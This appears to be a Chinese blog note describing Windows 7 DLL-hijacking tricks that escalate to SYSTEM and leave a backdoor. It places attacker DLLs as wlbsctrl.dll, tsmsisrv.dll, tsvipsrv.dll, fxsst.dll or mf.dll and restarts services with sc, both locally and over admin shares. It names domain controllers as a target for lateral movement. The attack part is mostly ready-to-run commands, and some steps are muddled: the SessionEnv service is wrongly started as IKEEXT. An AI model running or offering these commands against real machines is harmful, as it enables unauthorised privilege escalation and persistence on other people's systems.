win7提權system與後門

查考文章

今天看了一篇文章，發現文章中的利用方法只能在win7上使用，無法在win10上使用，特做記錄。

實現效果：

得到後門執行並得到system許可權。

ikeext(ike and authip ipsec keying modules)服務在啟動時會載入wlbsctrl.dll，但windows系統預設配置下該dll不存在，如果我們將自己的dll放在這個位置，在服務啟動時就能載入該dll.

copy calc_x64.dll c:\windows\system32\wlbsctrl.dll sc query ikeext sc stop ikeext sc start ikeext

遠端執行：

copy calc_x64.dll \\target\c$\windows\system32\wlbsctrl.dll sc \\target query ikeext sc \\target stop ikeext sc \\target start ikeext

sessionenv(remote desktop configuration)服務在啟動時會載入c:\windows\system32\tsmsisrv.dll和c:\windows\system32\tsvipsrv.dll，但windows系統預設配置下這兩個dll不存在，如果我們將自己的dll放在這個位置，在服務啟動時就能載入該dll,啟動sessionenv服務方法為sc start ikeext。

利用命令：

copy calc_x64.dll c:\windows\system32\tsmsisrv.dll sc query ikeext sc stop ikeext sc start ikeext 或者copy calc_x64.dll c:\windows\system32\tsvipsrv.dll sc query ikeext sc stop ikeext sc start ikeext 遠端執行的用法： copy calc_x64.dll \\target\c$\windows\system32\tsmsisrv.dll sc \\target query ikeext sc \\target stop ikeext sc \\target start ikeext 或者copy calc_x64.dll \\target\c$\windows\system32\tsvipsrv.dll sc \\target query ikeext sc \\target stop ikeext sc \\target start ikeext

如果系統開啟了遠端桌面的功能(支援遠端連線到此計算機)，就會開啟sessionenv(remote desktop configuration)服務，如果我們在c:\windows\system32\下寫入tsmsisrv.dll或tsvipsrv.dll，就能在服務啟動時載入該dll，實現**執行。

應用場景：

獲得域控制器檔案的遠端訪問許可權，但無法遠端執行命令.

1.如果域控制器未開啟遠端桌面的功能，在系統啟動時劫持explorer.exe對fxsst.dll的載入

寫入檔案c:\windows\fxsst.dll

2.如果域控制器開啟了遠端桌面的功能，在系統啟動時將開啟sessionenv服務，載入tsmsisrv.dll或tsvipsrv.dll

寫入檔案c:\windows\system32\tsmsisrv.dll或c:\windows\system32\tsmsisrv.dll

3.如果域控制器開啟了遠端桌面的功能，在使用者進行遠端桌面連線時將會載入mf.dll

實際測試：

測試環境： server2012r2 x64

寫入檔案c:\windows\system32\mf.dll，命令如下:

《lateral movement — scm and dll hijacking primer》的利用擴充套件

win7提權system與後門

2019 12 10 win7,win12提權練習

如何用程式刪除win 7下SYSTEM許可權的目錄

如何讓Win7不再彈出公升級Win10的提醒視窗

win7提權system與後門

2019 12 10 win7,win12提權練習

如何用程式刪除win 7下SYSTEM許可權的目錄

如何讓Win7不再彈出公升級Win10的提醒視窗

相關推薦